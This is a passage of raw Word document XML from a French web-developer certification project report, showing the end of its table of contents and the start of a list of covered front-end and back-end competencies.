    <w:p w14:paraId="63B1C321" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817800" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>8.3 Synthèse de la veille</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817800 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>25</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3597B2D3" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817801" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>9. DÉMARCHE DE RÉSOLUTION DE PROBLÈME</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817801 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>26</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="17B4251E" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817802" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>9.1 Description du problème</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817802 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>26</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7500A8EA" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817803" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>9.2 Analyse et diagnostic</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817803 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>26</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="355D21FA" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817804" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>9.3 Solution mise en œuvre</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817804 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>26</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50ED4F28" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817805" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>9.4 Vérification et résultat</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817805 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>26</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3B029B7B" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817806" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ANNEXES</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817806 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6E139160" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817807" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Annexe A – Maquettes complètes</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817807 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7FBD0BF4" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817808" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Annexe B – Captures d'écran des interfaces</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817808 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1280880E" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817809" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Annexe C – Code des composants significatifs</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817809 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="67F030AA" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817810" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Annexe D – Script complet de la base de données</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817810 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0487D0B7" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817811" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Annexe E – Documentation de déploiement complète</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817811 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="695E9F9F" w14:textId="36AFBBC6" w:rsidR="00506741" w:rsidRDefault="003239D4">
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC377EB" w14:textId="77777777" w:rsidR="00506741" w:rsidRDefault="00506741">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB9A9B0" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="1270C743" w14:textId="2FB1DF89" w:rsidR="002A5F4C" w:rsidRDefault="003239D4" w:rsidP="005D2D7E">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:spacing w:before="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc233817720"/>
      <w:r>
        <w:t>1. LISTE DES COMPÉTENCES COUVERTES PAR LE PROJET</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="0B990227" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc233817721"/>
      <w:r>
        <w:t xml:space="preserve">Bloc 1 – Développer la partie </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>front-end</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> d'une application web ou web mobile sécurisée</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="07F4371D" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="000F6513">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="35955054" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="26BB1848" wp14:editId="4C19EBE2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>209550</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>64770</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="152400" cy="76200"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1521258697"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BEDFF" id="Signe de multiplication 2" o:spid="_x0000_s1026" style="position:absolute;margin-left:16.5pt;margin-top:5.1pt;width:12pt;height:6pt;z-index:359550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" path="m32595,26316l40610,10286,76200,28081,111790,10286r8015,16030l96238,38100r23567,11784l111790,65914,76200,48119,40610,65914,32595,49884,56162,38100,32595,26316xe" fillcolor="black [3215]"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Installer et configurer son environnement de travail en fonction du projet web ou web mobile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF2F5B4" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="000F6513">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="53932580" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="267FCF14" wp14:editId="197B07F5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>209550</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>56515</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="152400" cy="76200"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1996574506"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E5568" id="Signe de multiplication 2" o:spid="_x0000_s1026" style="position:absolute;margin-left:16.5pt;margin-top:4.45pt;width:12pt;height:6pt;z-index:53932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Maquetter des interfaces utilisateur web ou web mobile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C8CDA4" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="000F6513">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="71910106" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2751D933" wp14:editId="1FED0717">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>209550</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>66040</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="152400" cy="76200"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="567419767"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493A3" id="Signe de multiplication 2" o:spid="_x0000_s1026" style="position:absolute;margin-left:16.5pt;margin-top:5.2pt;width:12pt;height:6pt;z-index:719101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Ze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" path="m32595,26316l40610,10286,76200,28081,111790,10286r8015,16030l96238,38100r23567,11784l111790,65914,76200,48119,40610,65914,32595,49884,56162,38100,32595,26316xe" fillcolor="black [3215]"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Réaliser des interfaces utilisateur statiques web ou web mobile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7785B87C" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="000F6513">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="89887632" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7CA9CBB9" wp14:editId="6335C2F6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>209550</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>56515</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="152400" cy="76200"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="37994198"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C7CE6" id="Signe de multiplication 2" o:spid="_x0000_s1026" style="position:absolute;margin-left:16.5pt;margin-top:4.45pt;width:12pt;height:6pt;z-index:8988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Développer la partie dynamique des interfaces utilisateur web ou web mobile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600357D1" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B4CE6FB" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc233817722"/>
      <w:r>
        <w:t xml:space="preserve">Bloc 2 – Développer la partie </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>back-end</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> d'une application web ou web mobile sécurisée</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="50462744" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="000F6513">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="107865158" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5CB98541" wp14:editId="20854DC2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>209550</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>62865</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="152400" cy="76200"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1902548695"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58B8C" id="Signe de multiplication 2" o:spid="_x0000_s1026" style="position:absolute;margin-left:16.5pt;margin-top:4.95pt;width:12pt;height:6pt;z-index:107865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Mettre en place une base de données relationnelle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5D2DC0" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="001D53B0">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
